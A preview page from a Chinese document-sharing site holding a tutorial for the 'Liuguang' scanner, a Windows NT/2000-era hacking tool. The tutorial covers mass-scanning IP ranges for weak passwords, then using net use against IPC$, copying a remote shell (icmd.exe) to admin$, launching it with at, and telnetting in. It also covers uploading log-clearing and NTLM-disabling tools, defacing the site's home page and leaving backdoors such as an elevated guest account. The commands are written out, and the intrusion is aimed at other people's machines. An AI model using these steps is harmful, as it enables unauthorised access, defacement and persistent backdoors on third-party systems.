流光使用说明

流光使用说明

ID:20393305

大小:30.50 KB

页数:3页

时间:2018-10-13

流光使用说明_第1页
流光使用说明_第2页
流光使用说明_第3页
资源描述:

《流光使用说明》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、1:流光概述流光是小容的作品,这款工具可以让一个只会点击鼠标的人成为专业的黑客,这样说一点也不夸张。它可以探测POP3,FTP,HTTP,PROXY,FROM,SQL,SMTP,IPC,等各种漏洞。并针对个中漏洞设计不同的破解方案。2:流光使用:步骤1:打开高级扫描向导设置扫描参数“文件”--}“高级扫描向导”--}在“起始”/“结束”位置填入,你要扫描的IP段。--}在“目标系统”中选择你要检测的操作系统。--}在“获取主机名”、“PING检查”前面打勾--}在“检测项目”中选择“全选”--}然后单击“下一步”选择“标准端口扫描”说明:“标准断口”只对常见的断口进行扫

2、描。“自定义”可以自己定义进行扫描。--}然后单击“下一步”设置好所有检测项目后点击“下一步”--}在选择主机界面选择“本地主机”使用本地主机进任务扫描。步骤2:单击“开始”扫描过程中要想停止选择“取消”不过要等一段时间。步骤3:查看扫描报告。扫描结束之后给出“HTLM”格式的报告方法二:一、POP3/FTP/…探测二、IPC探测三、SQL探测四、高级扫描五、其它…因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:)流光的IPC探测:一、目的和任务:1、用流光的IPC探测获得一台NT主机

3、的管理权限,并将这台主机做成一个跳板/代理。2、学习IPC探测的相关知识。二、探测流程:1、你得有流光,我这里试验用的是流光2001.FORWin2000中文版。FORWin98的不可以。因为IPC连接功能是NT/2000提供的功能。而且流光FOR2K要求你的操作系统得是NT/2000,否则流光启动会失败!什么是IPC:IPC是指"InterProcessCommunications",准确的说是ipc$,是默认的在系统启动时的admin共享。IPC$是WindowsNT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。注意,你试图

4、通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。可不可以通过IPC$暴力破解密码?当然可以!不过,是不是太笨了点…2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。在主界面选择探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取

5、消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度:)填入IP,选择扫描NT/98主机4、探测中……(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么?:)有的是!自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net命令吧。黑了他!开个dosprompt执行如下命令,本次用的例子如下图。1、netuse\对方ipipc$"密码"/user:"用户名"

6、

7、建立远程连接2、copyicmd.exe\对方i

8、padmin$

9、

10、admin$是对方的winnt目录:)这里文件多。3、nettime\对方IP

11、

12、看看对方的本地时间4、at\对方ip启动程序的时间启动程序名启动程序的参数

13、

14、用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代3/4两步。5、telnet对方ip端口

15、

16、6、输入pass(如果不是用icmd.exe,或者没有设置口令就不用了)

17、

18、7、在开个窗口,继续copy我们用的东西。copysock.execopyntlm.execopycl.execlear.exe如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,

19、我们可以通过dir/sdefault.htm或者dir/sindex.htm来确定对方首页的为止,一般是在X:interpubwwwroot.假如首页文件是default.htm并且在c:interpubwwwroot,这样:copydefault.htm\ipc$interpubwwwroot下面的图有演示8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:执行我们copy过去的ntlm.exe,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。